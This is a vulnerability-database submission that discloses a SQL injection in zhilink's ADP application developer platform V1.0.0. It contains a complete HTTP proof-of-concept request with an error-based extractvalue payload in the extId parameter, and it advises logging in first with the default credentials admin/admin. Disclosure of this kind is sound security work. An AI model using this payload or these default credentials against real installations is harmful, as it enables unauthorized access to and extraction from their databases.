Enviar #626189: 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 SQL Injectioninformación

Título	智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 SQL Injection
Descripción	漏洞地址：x.x.x.x:8083/adpweb/a/login GET /adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 HTTP/1.1 Host: x.x.x.x:8083 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=5F82478A113439530681B398B1596D9C; zhilink.session.id=2efebc93c5ec4946af83e7d1c81a1bd7; lang=zh_CN; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1705660638; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1705660673 Referer: http://x.x.x.x:8083/adpweb/a/tag/treeselect?url=%2Fsys%2Foffice%2FtreeData%3Ftype%3D1%26companyid%3D&module=&checked=&extId=&isAll= X-Requested-With: XMLHttpRequest Accept-Encoding: gzip 注入点参数：注入点参数：extId 使用默认口令admin/admin登录后测试注入 payload：/adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1
Fuente	⚠️ http://x.x.x.x:8083/adpweb/a/login
Usuario	Id3al (UID 85503)
Sumisión	2025-07-31 11:03 (hace 9 meses)
Moderación	2025-08-09 09:46 (9 days later)
Estado	Aceptado
Entrada de VulDB	319335 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 treeData inyección SQL]
Puntos	20

◂ Anterior Visión De Conjunto Próximo ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!